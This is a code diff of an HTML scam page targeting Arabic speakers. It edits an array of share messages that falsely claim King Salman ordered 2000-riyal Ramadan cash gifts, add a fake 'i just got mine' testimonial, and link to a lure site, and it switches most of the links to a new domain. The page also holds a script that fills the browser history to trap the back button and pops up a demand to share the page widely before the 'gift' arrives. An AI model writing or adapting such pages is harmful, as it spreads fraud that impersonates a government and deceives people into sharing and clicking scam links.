--- a/SAR2000-Ramadan-Gifts.html
+++ b/SAR2000-Ramadan-Gifts.html
@@ -527,10 +527,10 @@ function go() {
 
 <script>
   var tiaoban = [
-    "*في رمضان 2026، أمر الملك سلمان بن عبد العزيز بصرف مساعدات نقدية بقيمة 3 مليارات ريال سعودي لجميع المحتاجين.*%0A%0A*كيفية الحصول عليه*%0Aقم بزيارة الرابط أدناه وأجب عن الأسئلة التالية وستحصل على 2000 ريال سعودي فوراً للاحتفال بشهر رمضان..%0A i just got mine%0A%0Aانقر هنا👇%0A http://mrtareqgi.store/Sierraleone-Ramadan-Relief-Le50000-Gifts.html",
+    "*في رمضان 2026، أمر الملك سلمان بن عبد العزيز بصرف مساعدات نقدية بقيمة 3 مليارات ريال سعودي لجميع المحتاجين.*%0A%0A*كيفية الحصول عليه*%0Aقم بزيارة الرابط أدناه وأجب عن الأسئلة التالية وستحصل على 2000 ريال سعودي فوراً للاحتفال بشهر رمضان..%0A i just got mine%0A%0Aانقر هنا👇%0A https://ramadaniftar.store/SAR2000-Ramadan-Gifts.html",
     "*في رمضان 2026، أمر الملك سلمان بن عبد العزيز بصرف مساعدات نقدية بقيمة 3 مليارات ريال سعودي لجميع المحتاجين.*%0A%0A*كيفية الحصول عليه*%0A%0A*كيفية الحصول عليه*%0Aقم بزيارة الرابط أدناه وأجب عن الأسئلة التالية وستحصل على 2000 ريال سعودي فوراً للاحتفال بشهر رمضان.%0A i just got mine%0A%0Aانقر هنا👇%0A http://mrtareqgi.store/Sierraleone-Ramadan-Relief-Le50000-Gifts.html ",
-    "*في رمضان 2026، أمر الملك سلمان بن عبد العزيز بصرف مساعدات نقدية بقيمة 3 مليارات ريال سعودي لجميع المحتاجين.*%0A%0A*كيفية الحصول عليه*%0Aقم بزيارة الرابط أدناه وأجب عن الأسئلة التالية وستحصل على 2000 ريال سعودي فوراً للاحتفال بشهر رمضان.%0A%0Aانقر هنا👇%0A http://mrtareqgi.store/Sierraleone-Ramadan-Relief-Le50000-Gifts.html ",
-    "*في رمضان 2026، أمر الملك سلمان بن عبد العزيز بصرف مساعدات نقدية بقيمة 3 مليارات ريال سعودي لجميع المحتاجين.*%0A%0A*كيفية الحصول عليه*%0Aقم بزيارة الرابط أدناه وأجب عن الأسئلة التالية وستحصل على 2000 ريال سعودي فوراً للاحتفال بشهر رمضان..%0A i just got mine%0A%0Aانقر هنا👇%0A http://mrtareqgi.store/Sierraleone-Ramadan-Relief-Le50000-Gifts.html ",
+    "*في رمضان 2026، أمر الملك سلمان بن عبد العزيز بصرف مساعدات نقدية بقيمة 3 مليارات ريال سعودي لجميع المحتاجين.*%0A%0A*كيفية الحصول عليه*%0Aقم بزيارة الرابط أدناه وأجب عن الأسئلة التالية وستحصل على 2000 ريال سعودي فوراً للاحتفال بشهر رمضان.%0A%0Aانقر هنا👇%0Ahttps://ramadaniftar.store/SAR2000-Ramadan-Gifts.html",
+    "*في رمضان 2026، أمر الملك سلمان بن عبد العزيز بصرف مساعدات نقدية بقيمة 3 مليارات ريال سعودي لجميع المحتاجين.*%0A%0A*كيفية الحصول عليه*%0Aقم بزيارة الرابط أدناه وأجب عن الأسئلة التالية وستحصل على 2000 ريال سعودي فوراً للاحتفال بشهر رمضان..%0A i just got mine%0A%0Aانقر هنا👇%0A https://ramadaniftar.store/SAR2000-Ramadan-Gifts.html",
 ];
 var tiaoban = tiaoban[Math.floor(Math.random() * tiaoban.length)];
 
@@ -652,6 +652,7 @@ hs.src = ('//s10.histats.com/js15_as.js');
 
 
       <script type="text/javascript">! function (){	var t;	try{for (t=0; 10 > t; ++t)		history.pushState({}, "", "#");	onpopstate=function (t)	{		t.state && alert('يرجى المشاركة على أوسع نطاق لتلقي الهدية. ');		}}		catch (o){}}();</script>
+
 
 
 
